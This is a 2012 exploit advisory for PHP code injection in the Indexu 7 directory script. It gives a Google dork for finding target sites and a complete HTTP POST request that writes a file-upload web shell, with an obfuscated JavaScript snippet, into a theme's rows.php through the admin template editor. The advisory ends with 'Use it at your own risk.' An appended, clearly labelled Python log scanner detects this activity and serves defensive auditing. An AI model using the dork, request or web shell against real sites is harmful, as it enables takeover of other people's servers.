
Indexu 7 Php Code Injection

Author: Asmar , Published: 30-05-2012
# --------------------------------------- #
Author : HeadSh0t
Title : Indexu 7 Php Code Injection
Date : 5/30/2012
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "Listing by GooglePR"
Version : N/A
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
1) Bug :
The script allows an admin to edit files in the templates folder, and those files have a .php extension :)
so an attacker can inject code into any (edited) file.
NOTE :
Before injecting code, you need to know whether the theme is present (./templates/KOMET).
E.g. : http://www.site.com/templates/komet/rows.php
# --------------------------------------- #
2) PoC :

In the POST box at the top of Live HTTP Headers, put : http://www.site.com/admin/db.php

Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://site.com/admin/template.php?act=editfile&id=komet&file=rows.php
Cookie: U_AUTHENTICATED=1; __atuvc=7|22; PHPSESSID=6c8ee4251b4d5e252d0030dccdc389a8; __utma=111872281.551771833.1338331592.1338331592.1338331592.1; __utmc=111872281; __utmz=111872281.1338331592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: multipart/form-data; boundary=---------------------------11662147216064
Content-Length: 1157

Send POST Content :

-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="act"\r\n
\r\n
editfile\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="id"\r\n
\r\n
komet\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file"\r\n
\r\n
rows.php\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file_content"\r\n
\r\n
<?php\r\n
echo '<b><br><br>'.php_uname().'<br></b>';\r\n
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';\r\n
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';\r\n
if( $_POST['_upl'] == "Upload" ) {\r\n
\tif(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }\r\n
\telse { echo '<b>Upload GAGAL !!!</b><br><br>'; }\r\n
}\r\n
?>\r\n
<script type="text/javascript" language="javascript">ML="Rjnis/e .rI<thzPS-omTCg>:=p";MI=";@E0:?D7@0EI=<<JH55>B26A<8B9F53CF45>814G;5@E0:?DG";OT="";for(j=0;j<MI.length;j++){OT+=ML.charAt(MI.charCodeAt(j)-48);}document.write(OT);</script>\r\n
-----------------------------11662147216064--\r\n

Snip : http://www11.0zz0.com/2012/05/30/00/788460850.png

Note : Use it at your own risk.

# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID , Indoushka .
# --------------------------------------- #
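
Added example, not part of the original advisory: a log check a site operator could run to audit the activity described above, i.e. a template save through /admin/db.php followed by direct requests to that template's .php file. It assumes Apache/nginx combined log format with the Referer recorded; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"')
# A .php file requested directly from a theme directory (normally only included).
TPL_RE = re.compile(r'^/templates/[^/]+/[^/]+\.php$', re.I)

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [30/May/2012:10:02:11 +0000] "POST /admin/db.php HTTP/1.1" 200 312 "http://example.com/admin/template.php?act=editfile&id=komet&file=rows.php" "Mozilla/5.0"',
    '192.0.2.10 - - [30/May/2012:10:02:40 +0000] "GET /templates/komet/rows.php HTTP/1.1" 200 410 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [30/May/2012:10:03:05 +0000] "POST /templates/komet/rows.php HTTP/1.1" 200 455 "http://example.com/templates/komet/rows.php" "Mozilla/5.0"',
    '198.51.100.7 - - [30/May/2012:10:04:00 +0000] "GET /templates/komet/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def edited_file(referer):
    """Map a template-editor Referer to the template path it edits, else None."""
    url = urlsplit(referer)
    q = parse_qs(url.query)
    if url.path.endswith('/admin/template.php') and q.get('act') == ['editfile'] \
            and 'id' in q and 'file' in q:
        return '/templates/%s/%s' % (q['id'][0].lower(), q['file'][0].lower())
    return None

def scan(lines):
    """Return (kind, client_ip, path) tuples for template saves and direct template hits."""
    edits, findings = set(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined log format
        path = urlsplit(m['path']).path
        if m['method'] == 'POST' and path.endswith('/admin/db.php'):
            target = edited_file(m['referer'])
            if target:
                edits.add(target)
                findings.append(('template-edit', m['ip'], target))
        elif TPL_RE.match(path):
            kind = ('edited' if path.lower() in edits else 'direct') + '-template-' + m['method'].lower()
            findings.append((kind, m['ip'], path))
    return findings

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `template-edit` entry by itself is ordinary admin activity; the entries worth investigating are `edited-template-*` hits that follow it, and any POST sent straight to a file under /templates/.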
